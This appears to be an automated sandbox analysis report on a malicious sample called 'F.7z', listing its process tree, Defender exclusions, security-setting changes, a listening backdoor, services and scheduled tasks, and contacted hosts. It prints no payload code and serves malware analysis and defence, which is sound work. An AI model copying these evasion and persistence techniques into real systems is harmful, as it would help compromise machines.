Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Code function: 46_2_64942A90 GetSystemTimeAsFileTime, 46_2_64942A90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEF2860 GetUserNameA,GetLastError,_strdup, 46_2_00007FFA2CEF2860
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval Jump to behavior
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 0000000E.00000002.2323835397.0000022F5ED02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.2323835397.0000022F5ED02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Searches for user specific document files
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\Documents Jump to behavior
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3312D7E0 bind,WSAGetLastError, 51_2_00007FFA3312D7E0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330E78B0 memset,strncmp,strncmp,strchr,inet_pton,htons,strtoul,inet_pton,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 51_2_00007FFA330E78B0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330FC620 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons, 51_2_00007FFA330FC620
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3312D5B2 bind,WSAGetLastError, 51_2_00007FFA3312D5B2
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33126B0D htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket, 51_2_00007FFA33126B0D
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33126B40 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket, 51_2_00007FFA33126B40
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501605 Sample: F.7z Startdate: 30/08/2024 Architecture: WINDOWS Score: 100 108 worldtimeapi.org 2->108 110 universalsqlserver.privatelink.postgres.database.azure.com 2->110 112 2 other IPs or domains 2->112 122 Malicious sample detected (through community Yara rule) 2->122 124 Multi AV Scanner detection for dropped file 2->124 126 Multi AV Scanner detection for submitted file 2->126 128 13 other signatures 2->128 12 wscript.exe 1 2->12         started        15 svchost.exe 2->15         started        18 svchost.exe 2->18         started        20 9 other processes 2->20 signatures3 process4 dnsIp5 154 Wscript starts Powershell (via cmd or directly) 12->154 156 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->156 158 Suspicious execution chain found 12->158 23 cmd.exe 6 12->23         started        114 worldtimeapi.org 213.188.196.246, 49729, 80 TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO Italy 15->114 116 universalsqlserver.privatelink.postgres.database.azure.com 20.71.50.126, 49730, 5432 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 15->116 118 ipinfo.io 34.117.59.81, 443, 49726 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 15->118 160 Adds a directory exclusion to Windows Defender 15->160 26 cmd.exe 15->26         started        28 cmd.exe 15->28         started        30 cmd.exe 15->30         started        162 Changes security center settings (notifications, updates, antivirus, firewall) 18->162 32 MpCmdRun.exe 18->32         started        120 127.0.0.1 unknown unknown 20->120 106 C:\Users\user\AppData\Local\...\x249569.dat, PE32+ 20->106 dropped file6 signatures7 process8 signatures9 144 Suspicious powershell command line found 23->144 146 Wscript starts Powershell (via cmd or directly) 23->146 148 Drops executables to the windows directory (C:\Windows) and starts them 23->148 150 Uses schtasks.exe or at.exe to add and modify task schedules 23->150 34 printui.exe 23->34         started        52 7 other processes 23->52 152 Adds a directory exclusion to Windows Defender 26->152 38 powershell.exe 26->38         started        40 conhost.exe 26->40         started        42 powershell.exe 28->42         started        44 conhost.exe 28->44         started        46 powershell.exe 30->46         started        48 conhost.exe 30->48         started        50 conhost.exe 32->50         started        process10 file11 94 C:\Windows\System32\zlib1.dll, PE32+ 34->94 dropped 96 C:\Windows\System32\x338625.dat, PE32+ 34->96 dropped 98 C:\Windows\System32\usvc.dat, PE32+ 34->98 dropped 104 10 other files (8 malicious) 34->104 dropped 130 Adds a directory exclusion to Windows Defender 34->130 132 Suspicious command line found 34->132 54 cmd.exe 34->54         started        57 cmd.exe 34->57         started        59 cmd.exe 34->59         started        61 2 other processes 34->61 134 Loading BitLocker PowerShell Module 38->134 100 C:\Windows \System32\x249569.dat, PE32+ 52->100 dropped 102 C:\Windows \System32\printui.exe, PE32+ 52->102 dropped signatures12 process13 signatures14 136 Suspicious powershell command line found 54->136 138 Wscript starts Powershell (via cmd or directly) 54->138 63 powershell.exe 54->63         started        66 conhost.exe 54->66         started        140 Adds a directory exclusion to Windows Defender 57->140 68 powershell.exe 57->68         started        70 conhost.exe 57->70         started        142 Drops executables to the windows directory (C:\Windows) and starts them 59->142 72 console_zero.exe 59->72         started        74 conhost.exe 59->74         started        76 reg.exe 61->76         started        78 conhost.exe 61->78         started        80 4 other processes 61->80 process15 signatures16 164 Found suspicious powershell code related to unpacking or dynamic code loading 63->164 166 Loading BitLocker PowerShell Module 63->166 168 Multi AV Scanner detection for dropped file 72->168 82 cmd.exe 72->82         started        84 cmd.exe 72->84         started        170 Creates a Windows Service pointing to an executable in C:\Windows 76->170 process17 process18 86 conhost.exe 82->86         started        88 schtasks.exe 82->88         started        90 conhost.exe 84->90         started        92 schtasks.exe 84->92         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
213.188.196.246
 worldtimeapi.org Italy
25400 TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO false
34.117.59.81
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
20.71.50.126
 universalsqlserver.privatelink.postgres.database.azure.com United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
worldtimeapi.org 213.188.196.246 true
ipinfo.io 34.117.59.81 true
universalsqlserver.privatelink.postgres.database.azure.com 20.71.50.126 true
universalsqlserver.postgres.database.azure.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://worldtimeapi.org/api/timezone/Etc/UTC false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown